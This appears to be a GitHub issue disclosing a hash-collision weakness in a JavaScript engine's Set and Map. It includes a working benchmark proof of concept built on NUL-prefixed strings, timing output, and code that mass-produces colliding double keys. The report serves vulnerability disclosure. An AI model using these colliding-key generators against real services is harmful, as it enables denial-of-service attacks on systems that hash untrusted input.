
Set and Map are vulnerable to hash collisions #205

Open
@bnoordhuis

Description

import * as os from "os"
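// time inserting every element of `a` into a fresh Set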
function go(a) {
    const s = new Set()
    const t0 = os.now()
    for (let i = a.length; i-- > 0; s.add(a[i]));
    const t1 = os.now()
    return t1-t0
}
function fmt(x) {
    return ("       " + x).slice(-7)
}
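// keys: all 0x1001 suffixes of c.repeat(0x1000) + "k"; report min/median/max of 20 runs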
function bench(c) {
    const p = ("0000" + c.charCodeAt(0).toString(16)).slice(-4)
    const k = c.repeat(0x1000) + "k"
    const a = []
    for (let i = k.length; i-- > 0;) a.push(k.slice(i))
    let b = []
    for (let i = 0; i < 20; i++) b.push(go(a))
    b.sort((x, y) => x-y)
    b = b.map(fmt)
    print(p, b[0], b[9], b[19]); // min, median, max
}
for (let i = 0; i < 128; i++) bench(String.fromCharCode(i))

Prints:

0000  869180  886624  905783  # 8x slower on 64k inserts!
0001   95426  102488  157594
0002  100252  106452  172442
0003   96300  102617  128371
0004  112713  114385  229245
0005   95087  102894  108105
0006  105638  107379  161700
0007  102093  105335  168217
...

I exploit a weakness of map_hash_key() by inserting keys with ever-longer NUL prefixes - "k", "\0k", "\0\0k", etc. - that all hash to the same value and end up in the same hash bucket.
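For illustration, here's a minimal JS sketch of the string path. The multiplicative form h = h * 263 + c with seed 0 is my assumption about what map_hash_key() computes for strings; the point is only that a NUL code unit contributes nothing while h is still zero:

// Assumed hash (sketch, not the real implementation): h = h * 263 + code, seed 0.
// While h is 0, a NUL leaves it at 0, so any run of "\0" prefixes hashes like plain "k".
function hashString(s, h = 0) {
    for (let i = 0; i < s.length; i++)
        h = (h * 263 + s.charCodeAt(i)) >>> 0  // exact uint32 wrap: h*263+c < 2^53
    return h
}
print(hashString("k"), hashString("\0k"), hashString("\0\0k")) // 107 107 107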

Doubles-as-keys are exploitable too, and maybe ints as well, because ints are cast to doubles before hashing. The hash algorithm is this:

u.d = d;
h = (u.u32[0] ^ u.u32[1]) * 3163;

But there are literally millions of normal and subnormal doubles whose high and low words are bitwise identical and cancel each other out when xor'ed.
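A sketch of how to mass-produce such keys, using a typed-array view to control the double's bit pattern (the variable names are mine; the u32[0]/u32[1] split is the one from the snippet above):

// Force both 32-bit words of the double to the same value, so
// u32[0] ^ u32[1] == 0 and every key hashes to the same bucket.
const f64 = new Float64Array(1)
const u32 = new Uint32Array(f64.buffer)
const collisions = new Set()
for (let w = 1; collisions.size < 0x10000; w++) {
    u32[0] = w
    u32[1] = w
    const d = f64[0]
    if (d === d)            // skip the NaN patterns (exponent bits all set)
        collisions.add(d)
}

Inserting these 64k doubles into a Map or Set should degenerate every lookup into a linear scan of a single bucket, same as the string case above.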
